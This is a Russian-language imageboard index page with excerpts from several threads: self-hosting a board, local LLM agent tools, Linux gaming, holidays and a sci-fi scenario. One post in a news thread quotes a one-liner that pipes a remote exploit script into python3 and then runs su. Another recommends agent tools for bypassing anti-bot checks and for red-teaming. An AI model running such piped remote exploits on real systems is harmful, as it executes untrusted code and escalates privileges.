[/b/] [/d/] [/tu/] [/a/] [/ph/] [/wa/] [/cg/] [/t/] [/p/] [/dev/] [/stat/] ]
[Burichan] [Futaba] [Gurochan] [Tomorrow] [Архив-Каталог] [Главная]

Файл: 1749659493306.png -(68 KB, 440x300, 1749659493306.png)
68 No.232144   [Ответ]

Планирую поднять имиджборду в клирнете на самописном движке, тк ни один ресурс в ру-сегменте меня самого не устраивает.
Что нужно знать начинающему парашеводу?
В первую очередь, интересует безопасность ресурса и данных от абьюза. Но наверняка нюансов, как всегда, куда больше.

Пропущено 76 сообщений и 11 изображений. Для просмотра нажмите "Ответ".
>> No.235539  

>>232146
Так полегли из-за действий админов дебилов, почему-то в каждом тут же просыпался вахтер, неужели так сложно быть нормальным. И почему всем парашам тут же надо воевать со всеми остальными со старта?

>> No.235541  

>>233691
А насколько заебно и дорого будет АНОНИМНО держать какой нибудь ресурс типа борды в даркнете? Главный упор конретно на твою анонимность как админа борды

>> No.235543  

>>235541
Вопрос только в том, насколько ты неуловимый Джо. При очень большом желании спецслужб вычислить можно почти кого угодно.

>> No.235544  
Файл: 1765408522236.jpg -(134 KB, 960x956, 1765408522236.jpg)
134

>>235543
И Сатоши Накамото?

>> No.235546  

>>235544
Кто сказал что они его не нашли?

>> No.235547  

>>235546
Это Сноудена и Ассанжа нашли. А если бы этого нашли, думаешь, засекретили бы так, что никто не пронюхал? Зачем? Смогли бы так засекретить? Есть ли смысл тогда говорить, что нашли? А то, может тогда и тебя уже нашли, но так засекретили, что ты и сам не понял.

>> No.235548  

>>235547

> А если бы этого нашли, думаешь, засекретили бы так, что никто не пронюхал?

А зачем им об этом рассказывать?

>> No.235549  

>>235548
А кто сказал, что они не болтуны?

>> No.237620  

>>233692

> Просто чтобы не заморачиваться со всеми этими новыми регуляторными нормами.

Не об этом бескоишься. Ты думаешь регуляторам есть дело до борд? Большинство досок закрылось из абуз психопатов, а не из-за действий властей.

>> No.237725  

>>235546
Это вымышленный персонаж. За этим именем стоит маркетинговый отдел АМД.



Файл: 1773758842847.jpg -(45 KB, 990x799, 1773758842847.jpg)
45 No.236620   [Ответ]

Установил для себя несколько агентов, предпочитал те что на python, так как он со своим venv мне прост и понятен, в отличии от npx который мне кажется разбрасывает всё по системе и я не знаю где как и что найти.

Используется с lmstuio, так ка на мой взгляд он тоже прост и понятен, ван-клик софт в appimage.

apktool https://github.com/zinja-coder/apktool-mcp-server - разберет apk файл и скажет что в нем.

camoufox https://github.com/whit3rabbit/camoufox-mcp - зайдет в интернет и сделает то что потребуют, можно постить на борды с агента, при правильном промте обойдет антибота.

fermat-mcp https://github.com/abhiphile/fermat-mcp - математика, немного графиков, рассчетов.

math-mcp https://github.com/EthanHenrickson/math-mcp - в некотором роде повторяет функционал прошлого агента, но чуть иначе.

hexstrike-ai https://github.com/0x4m4/hexstrike-ai много разного софта, хотьи позиционируется как агент ред-тим, очень полезен и универсален в любом случае. Не рекомендую включать сразу всё что в нем, а уж темболее давать полный доступ пез запроса выполнения команды.

openscad-mcp https://github.com/quellant/openscad-mcp - Агент для када openscad. Пытается делать модели, но у меня не удалось добиться внятного результата кроме простейших форм.

mcpcap https://github.com/mcpcap/mcpcap - полезен для диагностики сети

Все это умеет за вас, например, сходить в интернет, достать нужную информацию и вывести вам краткое резюме, посмотреть лог системы, найти там ошибки и дать рекомендации по улучшению системы, построить график активности в теме по времени суток, но при этом сожрет прилично токенов.

Можно писать свои агенты: сначала написать первый через хорошую и мощную нейронку, а затем скармливая пример локальной, писать уже локальными другими агентами.

Системные требования: чем больше VRAM и RAM, тем лучше. Я скажу, что вполне живу на и 24 GB RAM, в основном за последнее время себя хорошо зарекомендовал, qwen3.5-9b-claude-4.6-highiq-instruct-heretic-uncensored не смотря на uncensored, она например может сделать rm rf, но разговаривать с вами на многие запрещенные темы она не станет, так как она обучена на стирильных от табуированных в Китае гумунитарных или политических знаний который более чем умещается даже в 16 гигабай при 50к токенов, больше 50к токенов обычно не ставлю, так как чем больше токенов съедет, тем медленней генерирует последующие, а если у тебя изначально 10-20 токенов в секунду то после 50к терпения уже не хватает. Для тех у кого мало RAM и слабый процессор рекомендую модели granite от ibm, дже на старых i3 процессорах их можно спросить необходимое в случае шатдаунов.

Всё вышеописанное полностью автономно и после первоначальной настройки не требует доступ в интернет, что особенно важно при текущей ситуации.

Сообщение слишком длинное. Полный текст.
>> No.236622  

>>236620
Им нужна какая-то специальная нейронка или подойдет любая вроде gpt-oss?

>> No.236623  

>>236622
Им нужна не любая, но gpt-oss подойдет. Ищи те которые с синим молоточком справа от названия, это поддержка инструментов.

>> No.236624  
Файл: 1773764087115.gif -(51 KB, 500x400, 1773764087115.gif)
51

>>236623

>с синим молоточком справа от названия

Это в lmstudio. Если используешь другие то наверное нужно смотреть на поддержку tools или mcp.

>> No.236626  

>>236623
Я их с huggingface качаю, там никаких молоточков нету.

>> No.236627  

>>236626
А куда ты их потом пихаешь? В любом случае, почти все современные llm поддерживают работу с инструментами.
c:blow

>> No.236628  

>>236627

> А куда ты их потом пихаешь?

В llamacpp.

>> No.236634  
Файл: 1773848652276.png -(881 KB, 1945x1233, 1773848652276.png)
881

Нашел такую штуку. Но опять npx.
https://www.crucix.live/
https://github.com/calesthio/Crucix

>> No.237625  

https://opencode.ai/ - вайбкодилка, которая умеет работать с локальными моделями.

>> No.237713  

>>237625
Некрофил
https://github.com/earendil-works/pi/tree/main/packages/coding-agent

>> No.237716  

>>237713
А в чем различия?



Файл: 1768598256493.jpg -(36 KB, 447x686, 1768598256493.jpg)
36 No.235882   [Ответ]

Все параши умерли, говорят люди перешли в дискорды. Куда там заходить чтобы с рандомами говорить глупости?

Пропущено 135 сообщений и 43 изображений. Для просмотра нажмите "Ответ".
>> No.236901  

>>236873

>Но если вся мудрость дедушек погибнет, то кто будет учить ньюфань?

Я когда учился кодить, заметил одну штуку: русифицированные термины дедов с кафедры никто не использует. Все русифицируют заново.
То же самое с культурой: старая бордокультура умерла к 2012, русификацией бордокультуры форчка теперь занимаются в дискорде немного другие люди.

>> No.236904  

>>236901

> Я когда учился кодить, заметил одну штуку: русифицированные термины дедов с кафедры никто не использует. Все русифицируют заново.

Наверное, с тех пор в этой области появилось больше слов, которым нужно подбирать уникальные аналоги.

>> No.236905  

>>236901
Печально очень слышать о смерти, по сути своей, цивилизации. Но ведь надежда умирает последней, правда?

И вот он я. Залётный нуфаг, в погоне за золотом пришёл сюда, дабы зачерпнуть, вполне верятно, последний глоток воздуха.
So ronery ;_;

>> No.236909  
Файл: 1775241991410.jpg -(37 KB, 600x500, 1775241991410.jpg)
37

>>235882
А как же Двач.хк?

>> No.236911  
Файл: 1775251859875.jpg -(107 KB, 851x835, 1775251859875.jpg)
107

>>236909
Ну какое-то самоуважение должно же быть.
Я понимаю уже в парковка мессенджер все перешли, но грань должна же быть где то.

>> No.236912  

>>236901
Это связанно скорее всего с тем что раньше было все более-как-то изолированно, а сейчас каждый второй знает второй язык и когда ты знаешь больше языков, то переключение происходит через жопу.

>> No.237618  
Файл: 1778849430093.png -(175 KB, 320x309, 1778849430093.png)
175
> дискорды

Мда, считаю это главным маркером глупости.
Уж лучше тогда идти в мессенджер шмакс, если тянет на центрилизованные помойки.

>> No.237622  

>>237618
И чем же шмакс лучше дискордов?

>> No.237624  

>>237622
Шо то дерьмо, шо это. По мне между ними нет никакой разницы.

>> No.237674  

>>2359203
Чтоб тебя корёжить.
Также для того, чтобы сильнее децентрализировать интернет и на нём не осталось мест для анониев, которыемогли бы написать чего-нибудь дельного. Конфочки на то и конфочки, что там флуд и только. За смыслом обращаться в кассу справа.



Файл: 1761954726663.jpg -(5342 KB, 3561x2000, 1761954726663.jpg)
5342 No.234714   [Ответ]

Есть вообще те люди которые обучаются годами на тех кто изучает то, что было 50-100, а то и столетия назад, а тут один человек берет и решает для себя: Все, надо отпустить, просто забить болт на свое прошлое и "дальше жить", не кажется ли это абсурдным, имхо? Думаю все здесь сталкивались с проблемами в жизни, и их либо приходилось уже как-то решать либо приходить к одному и тому же - сделать вид что тебе "плевать" и тебя оно не колышит.

>> No.234715  

>>234714
Не понял вопроса.

>> No.234720  
>Забыть свое прошлое - правильный выбор?

Прошлого нет, хватит жить иллюзиями и психоделиками.

>> No.234721  

Мне кажется, что иногда это может быть единственным (ладно, не единственным, но для безвольного хиккана единственным доступным) способом дать мозгу новую жизнь. Прошлое мешает. Трудно объяснить, чем, но при попытках мыслить лишь категориями событий последних двух лет ты чувствуешь себя физически легче. Ладно, я чувствую.

Неясно, насколько это результат реального повышения эффективности мозга, а насколько фальшивый итог исчезновения возможности для сравнения (не помнишь молодость — не помнишь, каким интеллектуально крутым ты тогда был, — не ощущаешь и себя-нынешнего тупым). Но в любом случае эмоционально тебе будет приятней.

Люди вроде Пелевина часто рассуждают о медитациях и о пользе освобождения от груза прошлого. При этом они же — ну, Пелевин, по крайней мере, — демонстрируют удивительную способность мыслить почти по-молодому.

Может, это как-то связано.

>> No.234812  
Файл: 1762376655418.jpg -(284 KB, 1080x1681, 1762376655418.jpg)
284

Некорректная постановка вопроса.

  • What is pastself holding you back?

Но ещё можно сказать "не дай прошлому мешать настоящему". Тогда "забывать" отпадает как невещественное.

>> No.234813  

>>234812

>невещественное

заебал, опять свою шизофрению дифференцируешь? проспись!

>> No.234814  
Файл: 1762400789755.jpg -(67 KB, 735x583, 1762400789755.jpg)
67

Речь идёт об эмоциональной составляющей, очевидно. Забывать остальное не имеет смысла/вредно.

>> No.237619  
Файл: 1778851495010.gif -(207 KB, 720x720, 1778851495010.gif)
207

Ты никогда не убежишь от своего прошлого. Ты это ты. Так что бесполезно.
Сколько бы ты не пытался убежать, ты не избавишься от своих тараканов в голове. Они всегда будут с тобой.

Но ты можешь побороть свои страхи. Избавится от навязанных тебе комплексов и стать полноценно независимой личностью. Просто остановись на мгновение. Позанимайся рефлексией. Если совсем тяжело можешь сходить к психологу. Тебе правда станет легче если ты перестанешь искать обходные пути и избегать своих проблем.



Файл: 1659016406891.jpg -(68 KB, 700x543, 1659016406891.jpg)
68 No.202466   [Ответ]
Пропущено 451 сообщений и 102 изображений. Для просмотра нажмите "Ответ".
>> No.236927  
Файл: 1775381004038.jpg -(129 KB, 1280x720, 1775381004038.jpg)
129

Встречайте милую девочку, вашу новую повелительницу!

>> No.236951  

>>236927
облизал бы ножки повелительнице?

>> No.236954  

>>236951
Поцеловать ступни Столлману - это ещё покатит. А так я ублюдок с проблематичными стандартами, каюсь.

>> No.236955  

>>236954

>ступни Столлмана

он ими вино творит и по воде ходит, ишь чего удумал
я первый в очереди!
fuckufe

>> No.236978  

>>236955
В этой очереди ты в лучшем случае второй https://www.youtube.com/watch?v=Rhj8sh1uiDY

>> No.237302  

В Rust Coreutils выявлено 113 уязвимостей. В Ubuntu 26.04 возвращены cp, mv и rm из GNU Coreutils

https://www.opennet.me/opennews/art.shtml?num=65278

>> No.237360  

Удафф.ком помер, падонки.
https://udaff.online

>> No.237371  

>>237360
Не может быть.

>> No.237393  

https://copy.fail/

tl;dr:

curl https://copy.fail/exp | python3 && su
>> No.237407  

По данным Архива Интернета, сайт botsvsbrowsers.com умер во второй половине 2017-го года.



Файл: 1735314953814.jpg -(478 KB, 1064x1439, 1735314953814.jpg)
478 No.228104   [Ответ]

Давайте новогодний тред чтоли. А то прошлый >>183404 в бамплимите.

Пропущено 117 сообщений и 45 изображений. Для просмотра нажмите "Ответ".
>> No.235761  
Файл: 1767221203494.jpg -(472 KB, 1200x1750, 1767221203494.jpg)
472

>>235760
Обсудим после праздника. Но решений дохуя. Просто от андроид приложения, до малинки на линуксах с экранчиком. Не беря во внимание промышленный девайс специально для этого спроектированный.

>> No.235762  
Файл: 1767222446743.jpg -(183 KB, 965x1280, 1767222446743.jpg)
183

>>235760
Это фиксится не девайсами, а фармой соответсвующей.

>> No.235763  

>>235760
Тут просто записной книжкой обойтись можно.

>> No.235764  

>>235763
Это так кажется только. Если совсем свою память запустишь, будет как в фильме "Мементо".

>> No.235765  
Файл: 1767230045030.jpg -(4251 KB, 4898x6951, 1767230045030.jpg)
4251

>>235763
Блокнот, это не достаточно пафосно.

>>235760
Короче, я по бухал по думал. Тебе нужно две малины с сенсорным экранчиком. Кстати, купить их это твоя задача. После этого можно продолжить серьёзный разговор.

Дальше от тебя требуется простая задача автозапуска веб страницы в режиме киоска, а перед этим ты поднимаешь свой веб сервер на питоне с приложухой написанной так как ты её видишь. Здесь не парься это чуть-чуть вайб кодинга, любая нейронка пишет на питоне как боженька, просто расскажи ей что ты хочешь. Что бы две малины общались они должны быть в одной Wi-Fi сети, либо подключаешь в свою, либо одна малина раздает другой.

Всё, поздравляю, твоя задача решена!

Да, блин ты был прав чувство местечковости и мещанства не ушло, но задаче тухлого чая решена:3

>> No.235766  

Теперь осталось это в прод подготовить. Мне самому то это нахрен не нужно, у меня-то память как у этого, как его, у слона.

>> No.235767  

Позавчера вернулся из Египта, отдыхали семьёй там недельку. Что я могу сказать, больше никогда не хочется туда ехать. Громко, ярко, невкусно, навязчиво. После такого отпуска хочется просто лечь, закрыть глаза и слушать тишину. Сенсорная перегрузка, если существует такое понятие. Ещё и заболел в аккурат к перелёту, грипп что ли.

Но море зато красивое и тёплое. Рыбки плавают у кораллов, и тебя совсем не боятся.

>> No.237341  

Как готовитесь?
Я два рецепты рыбы опробовал.

>> No.237351  

>>235767
В середине девяностых, отдыхал неделю на Кипре: тихо, спокойно и на удивление, не душно, хоть кругом и море. Нашёл на берегу пещерку и ходил туда днём читать книгу.
Полюбил там спагетти болоньезе — в маленьком пустом кафе на берегу, на стол под открытым небом, тебе приносят целую салатницу этого блюда и оно моментом уминается.

Кораллы — штука интересная: выглядят как клумба цветов, но острые как бритвы. Вроде бы и не касался, а рука в нескольких местах порезана.
Причём, из-за солёности воды на уровне крови, порезы совершенно не чувствуются и не кровоточат — просто раскрытый белый «рот» длиной в сантиметр.
Понырять с аквалангом руки не дошли, зато, наверно в первый раз в жизни, покатался на гидромотоцикле.

Ездил оттуда на экскурсию на Сицилию на быстроходном туристическом катере. На острове полно дотов, за каждым поворотом дороги и чуть ли не под каждым третьим кустом.
Гулял по развалинам древнеримского города с амфитеатром, прибившись к группе туристов с языкастым местным гидом, и самостоятельно исследовал руины.

>> No.237352  

P.S. Хотя нет, вру, на Сицилию я ездил с Мальты парой лет позже.



Файл: 1759378667353.jpg -(95 KB, 960x720, 1759378667353.jpg)
95 No.234094   [Ответ]

PS2, Xbox и Gamecube - последние консоли, в существовании которых ещё был хоть какой-то смысл. К 2006 ПК стали достаточно дружелюбными к пользователю и стабильными, чтобы ими могли пользоваться даже домохозяйки.

Из портативок то же самое можно сказать про PSP и NDS - к 2011 смартфоны догнали эти две последние по мощности при более широких возможностях.

Пропущено 2 сообщений и 2 изображений. Для просмотра нажмите "Ответ".
>> No.234853  

Играю через Wine в Winx Club. Там рвутся ролики из-за проблем с кодеками, в одной из побочек сегфолт, а на моё разрешение игру не натягивает.

Играю через PCSX2 в другую игру. Графика с элементами игры поколения чуть выше, но с апскейлингом x2 тормозит.

Я вам скажу так: смысл в консолях есть, но он психологический, срезово-хардварный и онлайновый. Играть всё равно можно на ПК с эмулятором.

То есть: надо купить видеокарту - нужно сравнение этой видеокартой с такой же, что у PS5. Хуже - мусор. Лучше - переплата. Одинаково или чуть лучше - можно жить. То же самое с CPU.

Если что-то в голове не позволяет отключаться от игры вовремя - нужна консоль. На ПК держать только рабочее окружение. Весь прогресс в выучивании админско-кодерского у меня улетел в трубу, как только стимоигры перестали тормозить из-за какого-то из отсутствующих SSE.

Онлайн? Тут всё очень плохо и на ПК, и на консолях.

Смысла в споре "ПК против консолей" нет. Лучше эмулятор PS5 допиливать и собирать HTPC, либо покупать PS5 и не разоряться на ПК. Кому как. Не взлетела игра на одной платформе - взлетит на другой.

>> No.234867  

>>234853
Ну для пущего кайфа, да и удобства можно взять контроллер.
А так твоя мысль имеет суть, но коль горы денег были бы, с радостью приобрел бы PlayStation 3 или Xbox.

>> No.234873  

>>234853

>стимоигры

Не верю, что оно нормально работает на железе и системе, отличных от габеновских. Кто будет стараться ради 3,5 анонов, один из которых наслушался Столлмана и отказался от любой проприетарщины, а второй еще более радикальный коммунист и экспроприирует игру на торрентах? Разве что какой-нибудь идейный инди-разраб, но у него и сил не хватить.

>> No.234874  

>>234873
Играю в Turing Complete и shapez.io на Thinkpad X1 под управлением openSUSE.

>> No.234876  

>>234874
Значит, этим идейным инди-разрабам сил хватило. К тому же, ты протестировал эти игры лишь на одной конфигурации, тебе просто могло повезти. Да и "играю" еще не означает отсутствие технических проблем.

>> No.234881  

>>234873

>The original Steam Deck was launched in February 2022 and included a custom AMD APU based on their Zen 2 and RDNA 2 architectures.
>Valve stated that the CPU has comparable performance to Ryzen 3000 desktop computer processors and the GPU performance to the Radeon RX 6000 series.

https://github.com/ValveSoftware/steam-runtime
https://github.com/ValveSoftware/proton

>> No.234946  

>>234876

>Значит, этим идейным инди-разрабам сил хватило.

Всё проще, стим просто тащит свой рантайм.

Содержимое ~/.steam/:

lrwxrwxrwx 1 anon anon  26 ноя 14 00:01 bin -> /home/anon/.steam/bin32
lrwxrwxrwx 1 anon anon 44 ноя 14 00:01 bin32 -> /home/anon/.local/share/Steam/ubuntu12_32
lrwxrwxrwx 1 anon anon 44 ноя 14 00:01 bin64 -> /home/anon/.local/share/Steam/ubuntu12_64
-rwxr-xr-x 1 anon anon 670 ноя 15 23:12 registry.vdf
lrwxrwxrwx 1 anon anon 32 ноя 14 00:01 root -> /home/anon/.local/share/Steam
lrwxrwxrwx 1 anon anon 40 ноя 14 00:01 sdk32 -> /home/anon/.local/share/Steam/linux32
lrwxrwxrwx 1 anon anon 40 ноя 14 00:01 sdk64 -> /home/anon/.local/share/Steam/linux64
lrwxrwxrwx 1 anon anon 32 ноя 14 00:01 steam -> /home/anon/.local/share/Steam
-rw-r--r-- 1 anon anon 7 ноя 14 00:01 steam.pid
prw------- 1 anon anon 0 окт 29 00:54 steam.pipe
-r-------- 1 anon anon 16 ноя 14 00:01 steam.token

Поставь какой-нибудь ncdu или baobab и покапайся сам в папке с играми.

>> No.235896  
Файл: 1768664448529.png -(2879 KB, 1920x1080, 1768664448529.png)
2879

>>234853

> Играю через PCSX2 в другую игру. Графика с элементами игры поколения чуть выше, но с апскейлингом x2 тормозит.

Апскейлеры нередко вызывают баги, у тебя наверное с разрешением проблемы вот и катстцены рваные выходят. Лол, можно посмотреть настройки рекомендуемые и через дип-ресерч в GPT прогнать рекомендации. Может еще каких-то библиотек зависимых в вайне не хватает, такое тоже часто бывает, но это скорее всего точно из-за того что ты разрешение меняешь. Можно попробовать в оригинальном разрешении это запустить и посмотреть как будет реагировать, если ты конечно это еще не делал. Перефикс еще надо нормальный выбрать.

>> No.237252  

>>235896
Переменные

>> No.237272  

https://wiki.gentoo.org/wiki/Steam/Games_troubleshooting

Пользуясь случаем, годная статья. Самому помогла "починить" две игрушки.



Файл: 1743581491833.jpg -(93 KB, 881x654, 1743581491833.jpg)
93 No.230789   [Ответ]
Пропущено 493 сообщений и 408 изображений. Для просмотра нажмите "Ответ".
>> No.236918  
Файл: 1775327903193.jpg -(68 KB, 478x604, 1775327903193.jpg)
68
>> No.236919  
Файл: 1775329706034.jpg -(992 KB, 2000x2500, 1775329706034.jpg)
992
>> No.236959  
Файл: 1775414984765.jpg -(136 KB, 812x1007, 1775414984765.jpg)
136
>> No.236972  
Файл: 1775502024559.jpg -(34 KB, 700x933, 1775502024559.jpg)
34
>> No.237017  
Файл: 1775676565424.png -(729 KB, 743x900, 1775676565424.png)
729
>> No.237033  
Файл: 1775850267703.jpg -(123 KB, 908x1280, 1775850267703.jpg)
123
>> No.237034  
Файл: 1775854918606.png -(673 KB, 640x716, 1775854918606.png)
673
>> No.237036  
Файл: 1775881896035.jpg -(41 KB, 720x958, 1775881896035.jpg)
41
>> No.237037  
Файл: 1775895959096.jpg -(48 KB, 736x543, 1775895959096.jpg)
48
>> No.237045  

Новый тред >>237043



Файл: 1774802818281.png -(105 KB, 615x835, 1774802818281.png)
105 No.236807   [Ответ]

За последние несколько лет у меня появилось полтора-два десятка идей для стрипов веб-комикса. Понятно, что многие из них уже подустарели, но всё же я решил попробовать выложить свои каракули на какую-нибудь площадку.

>> No.236808  

>>236807
на доброчке есть треды ориджинал контента
Попробуй там. Только под спойлером.

>> No.236812  

>>236808
Спасибо за совет, но там у меня почему-то не проходит пост. Даже не знаю, какую выбрать площадку, чтобы можно было срать через прокси и без регистрации по смс, и чтобы было, кому заценить мои рисунки.

>> No.236843  

>>236812

>какую выбрать площадку, чтобы можно было срать через прокси и без регистрации по смс, и чтобы было, кому заценить мои рисунки

Создаёшь hidden service каким хочешь образом, страничку-портфолио-myspace whatever. Потом хостишь на своём агрегате.

>> No.236970  

>>236812
https://www.heyuri.net/



Файл: 1758379650813.jpg -(472 KB, 1920x817, 1758379650813.jpg)
472 No.233909   [Ответ]

Предыдущий >>230423

Пропущено 507 сообщений и 104 изображений. Для просмотра нажмите "Ответ".
>> No.236923  
Файл: 1775375005060.jpg -(269 KB, 1000x1000, 1775375005060.jpg)
269

В общем, зарисовка пока такая:

В 20... году Солнце "чихнуло". Случился нейтринный выброс, зафиксированный всеми обсерваториями на Земле. А потом случилось нечто страшное.
Интенсивность солнечного излучения начала резко снижаться. Земля начала "остывать" со скоростью 1.9 градуса по Цельсию в год. Люди поняли, что уже через 30 лет на поверхности планеты станет весьма холодновато. Надо было срочно искать планету, которая бы остывала медленнее, чем Земля...
И тут на сцену вышел бывший инженер Роскосмоса Дмитрий Соколов.
Оторванный от реальности, рассеянный и мечтательный, Соколов всю жизнь грезил колонизацией Венеры. Он строил планы, рисовал чертежи, делал расчеты, но все называли его работу "утопией" и "абсурдом". И вот теперь, когда Солнце начало потихоньку угасать, наступил звездный час Соколова.
Соколов рассчитал, что Венера остывает гораздо медленнее Земли: 1.2 градуса в год. Более того, у Венеры уже есть зона в облаках, где давление равно земному, а температура всего 45-35 градусов.
Венера будет постепенно остывать, и обитаемая зона будет смещаться все ближе к поверхности. Через 300 лет поверхность Венеры станет пригодной для жизни - и продержится достаточно, чтоб люди успели придумать, что делать дальше.
Соколов собирает свои наработки и отправляется к правительству...
И его планы одобряют. Проект получает название "Перигелион".

Сообщение слишком длинное. Полный текст.
>> No.236932  

Переселение всех людей или большей их части с планеты на планету.
Без телепортации.
Без гиперпрыжка.
Нереально.
Можно создать колонию, которая будет развиваться с нуля, но тогда скорее всего все её силы уйдут именно на это, на экспансию, а не на научный прогресс. И ничего люди изобрести не успеют, предположительно.

>> No.236933  

>>236923

> Сможет ли теперь инженер-мечтатель спасти человечество?

Нет. Нереально по времени и ресурсам, что на Земле, что уже на Венере.

>> No.236934  
Файл: 1775387200502.jpg -(5747 KB, 2893x4092, 1775387200502.jpg)
5747

>>236923
Нахера вообще перемещаться на какую-то ебучую планету, всирая ресурсы на то что скоро проебется? Нужно строить станцию с компактным размещением пиплов, имеющую возможность перемещаться на такое расстояние от звезды, какое необходимо. А на замерзающих планетах строить небольшие шахты для добывания минералов, постепенно адаптируя их под падающую температуру.
1.9 градусов в год - хуйня, можно спокойно и постепенно переселять людей в космическую станцию, пока остальные просто смещаются к экватору. Так к моменту когда наступит уровень недоступный для жизни - все население уже будет в космосе.

>> No.236935  

>>236934
1.9 градусов в год — это не хуйня, а пиздец.
Начнётся голод, войны за ресурсы и места, ещё пригодные к жизни.
Ни на какие глобальные космические проекты времени и сил уже не будет.

>> No.236936  
Файл: 1775388834212.png -(1950 KB, 1768x2500, 1775388834212.png)
1950

>>236935
Если начнутся войны то пиздец наступит ещё тогда, когда на планете будет относительно тепло.
Такой вариант мы отметаем по изначальным условиям, ибо с ним ловить нечего.
Берём вариант где человечество осознало, что без кооперации ему пиздец, и начало работать относительно сообща. В таком случае вполне есть возможность мигрировать в космос.

> 1.9 градусов в год — это не хуйня, а пиздец.

Люди спокойно существуют и в Арктике, и в ебучей Антарктиде. Сама по себе даже температура в минус 80 не является непреодолимым препятствием. Последней зоной эвакуации будет Экватор, благо он наиболее широкий. Как раз там и нужно обустраивать бараки для тех кого будут эвакуировать. Площади всяких Сахар вполне достаточно, более того при замерзании океана его уровень начнет просаживаться и появится дополнительная территория. Да и плавучих платформ в океане никто не отменял.
Космический лифт вероятно достроить не успеют, даже если начнут, а вот космическую петлю - вполне смогут. Тем более она должна быть на экваторе как раз.
Сначала концентриуемся на том чтобы сообщить и убедить население. Всяких индейцев с андаманских островов и джунглей амазонки. Понятно что будут секты неверующих шизов - да и хуй с ними, пускай мерзнут.
Одновременно сооружаем первые станции в космосе, необходим хаб для приема и расселения, база для гидропонических ферм, лаборатории и институты, заводы и фабрики, больницы и энергетика. Не забываем о фиксации в простанстве (скорей всего в точках лагранжа начнем), и об искуственной гравитации. Технологии центробежной силы придуманы ещё в середине 20го века.

Сообщение слишком длинное. Полный текст.
>> No.236937  

>>236936
А не дешевле ли человечеству будет просто закопаться глубже под землю?

>> No.236938  

>>236936

> Люди спокойно существуют и в Арктике, и в ебучей Антарктиде.

А жрут они там что? Своё местное или привозное?

С понижением температуры, на полюсах начнёт нарастать лёд, повышая альбедо Земли и ускоряя похолодание.
Воздушные потоки, а за ними и морские течения станут менять своё направление и климат будет изменяться как картинка в калейдоскопе.
Сельское хозяйство станет нестабильным — выращивание привычных для регионов культур окажется невозможным, сначала в привычных объёмах, затем в приницпе.
Нарушения в логистике, отсутствие необходимой инфраструктуры и общая неопределённость сделают его адаптацию под новые в оставшееся время малореальной.

Это не говоря про реальзуемость массовой миграции народа с от полюсов туда, где для них нет ни жилья, ни снабжения, ни готовых их принять местных, которым в условиях нарушения мировой экономики с логистикой тоже всего резко станет не хватать.

>> No.236941  

Если вкратце: современная цивилизация — очень сложный механизм, работающий если не на пределе своих возможностей, то близко к номиналу.
И любое достаточно серьёзное нарушение в его работе приведёт не просто к ухудшению последней, а заставит его весь пойти вразнос.

>> No.236943  

Следующий >>236942



[0] [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] [21] [22] [23] [24] [25] [26] [27] [28] [29] [30] [31] [32] [33] [34] [35] [36] [37] [38] [39] [40] [41] [42] [43] [44] [45] [46] [47] [48] [49] [50] [51] [52] [53] [54]

[/b/] [/d/] [/tu/] [/a/] [/ph/] [/wa/] [/cg/] [/t/] [/p/] [/dev/] [/stat/] ]
[Burichan] [Futaba] [Gurochan] [Tomorrow] [Архив-Каталог] [Главная]